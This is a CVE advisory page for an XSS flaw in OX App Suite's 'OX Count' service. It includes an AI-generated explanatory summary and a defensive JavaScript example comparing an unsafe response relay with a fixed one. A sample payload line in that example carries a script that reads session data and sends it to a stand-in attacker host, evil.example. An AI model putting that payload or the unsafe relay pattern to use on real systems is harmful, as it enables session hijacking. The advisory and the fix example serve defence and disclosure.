VYPR
Unrated severity · NVD Advisory · Published Aug 2, 2023 · Updated Aug 2, 2024

CVE-2023-26450


Description

The "OX Count" web service did not specify a media-type when processing responses by external resources. Malicious script code can be executed within the victim's context. This can lead to session hijacking or triggering unwanted actions via the web interface and API. To exploit this an attacker would require temporary access to the user's account or lure a user to a compromised account. We are now defining the accepted media-type to avoid code execution. No publicly available exploits are known.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

The OX Count web service did not define an accepted media-type when handling responses from external resources, enabling script execution (XSS) in the victim's context that could lead to session hijacking or unauthorized actions via the web interface and API.

Vulnerability

The OX Count web service, part of OX App Suite, fails to specify a media-type when processing responses from external resources. The issue affects versions released before the vendor fix of 2023; the page lists three affected products but no version detail. Because the response type is neither requested nor enforced, attacker-supplied script code can end up executing in the victim's browser context. The issue is described in the vendor advisory and external references [1].

Exploitation

The attacker needs temporary access to the victim's account, or must lure the victim into using an attacker-controlled (compromised) account. The attack path implied by the description: the attacker causes OX Count to process an external resource whose response body is script. Because the service neither requests nor enforces an accepted media-type, that response can reach the browser in a form the browser treats as executable content, so the script runs inside the victim's session [1]. No public exploit code is known, and the attack depends on user interaction or prior account access; the exact endpoint and request flow are not published on this page.

Impact

Successful exploitation results in arbitrary script execution within the victim's browser, in the application's origin. This can lead to session hijacking, allowing the attacker to impersonate the user and trigger unwanted actions via the web interface and API. The impact is a compromise of confidentiality and integrity, since the attacker acts with the victim's privileges [1].

Mitigation

The vendor addressed the vulnerability by defining the accepted media-type for responses from external resources, so a response of any other type is no longer handed to the browser as executable content. The fix was released in 2023; users should update to the latest version of OX App Suite. No workarounds are detailed, and the CVE is not listed in CISA's KEV catalog. For further details, refer to the vendor advisory and the Packet Storm reference [1].
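The relay-and-pin pattern described in the Exploitation and Mitigation sections, as an added illustration that is not OX App Suite code: a service that forwards an external resource's response without fixing a media-type, beside one that requests, checks and pins a single accepted media-type and disables sniffing. All function names, the ACCEPTED_MEDIA_TYPE constant and the sample upstream responses are hypothetical and constructed here; the real endpoint, media-type and code path in OX Count are not published on this page.

```javascript
// Added example, not OX App Suite code. Models the vulnerable pattern the
// description implies (relaying an external resource without fixing its
// media type) beside the class of fix it describes (a pinned, enforced type).
// ACCEPTED_MEDIA_TYPE, relayUnsafe, relaySafe and the upstream objects are
// hypothetical; the fetch itself is replaced by constructed responses.
const ACCEPTED_MEDIA_TYPE = 'application/json';

// Constructed stand-in for a fetched external resource (no network involved).
function makeUpstream(contentType, body) {
  const headers = {};
  if (contentType !== null) headers['content-type'] = contentType;
  return { headers, body };
}

// Request headers the relay sends upstream: the vulnerable variant states no
// preference, the hardened one asks for exactly one media type.
function upstreamRequestHeaders(hardened) {
  return hardened ? { Accept: ACCEPTED_MEDIA_TYPE } : {};
}

// Vulnerable pattern: whatever the external resource returned is forwarded
// as-is. A text/html body, or a body with no type at all (which browsers
// sniff), renders inside the application's own origin.
function relayUnsafe(upstream) {
  const headers = {};
  const ct = upstream.headers['content-type'];
  if (ct !== undefined) headers['Content-Type'] = ct;
  return { status: 200, headers, body: upstream.body };
}

// Media type without parameters: "application/json; charset=utf-8" -> "application/json".
function parseMediaType(value) {
  if (typeof value !== 'string') return '';
  return value.split(';')[0].trim().toLowerCase();
}

// Hardened pattern: the upstream media type must be the accepted one, the
// body must actually parse as that type, and the outgoing response carries a
// fixed Content-Type plus nosniff so the browser cannot reinterpret it.
function relaySafe(upstream) {
  const fixedHeaders = {
    'Content-Type': ACCEPTED_MEDIA_TYPE,
    'X-Content-Type-Options': 'nosniff',
  };
  const reject = (reason) => ({
    status: 502,
    headers: { ...fixedHeaders },
    body: JSON.stringify({ error: reason }),
  });
  if (parseMediaType(upstream.headers['content-type']) !== ACCEPTED_MEDIA_TYPE) {
    return reject('unexpected media type');
  }
  let parsed;
  try {
    parsed = JSON.parse(upstream.body);
  } catch (e) {
    return reject('body is not valid JSON');
  }
  // Re-serialised from the parsed value, never the raw upstream bytes.
  return { status: 200, headers: { ...fixedHeaders }, body: JSON.stringify(parsed) };
}

// Constructed sample responses an attacker-controlled resource might return.
const SCRIPT_BODY =
  '<script>fetch("/api/session").then(r=>r.text()).then(t=>location="//evil.example/?"+t)</script>';
const SAMPLES = {
  html: makeUpstream('text/html', SCRIPT_BODY),
  untyped: makeUpstream(null, SCRIPT_BODY),
  json: makeUpstream('application/json; charset=utf-8', '{"count":3}'),
  mislabeled: makeUpstream('application/json', SCRIPT_BODY),
};

// Status each sample gets from both relays, for a side-by-side comparison.
function compare() {
  const out = {};
  for (const [name, up] of Object.entries(SAMPLES)) {
    out[name] = { unsafe: relayUnsafe(up).status, safe: relaySafe(up).status };
  }
  return out;
}
```

The two checks that matter are the media-type comparison and the re-serialisation: the first rejects an attacker's HTML or untyped body before it is ever forwarded, the second guarantees that even a resource that lies about its type (`mislabeled`) cannot smuggle markup through, because only a value that parsed as JSON is written back out.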

References
  1. Packet Storm

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 3

Patches: 0 (no patches discovered yet)
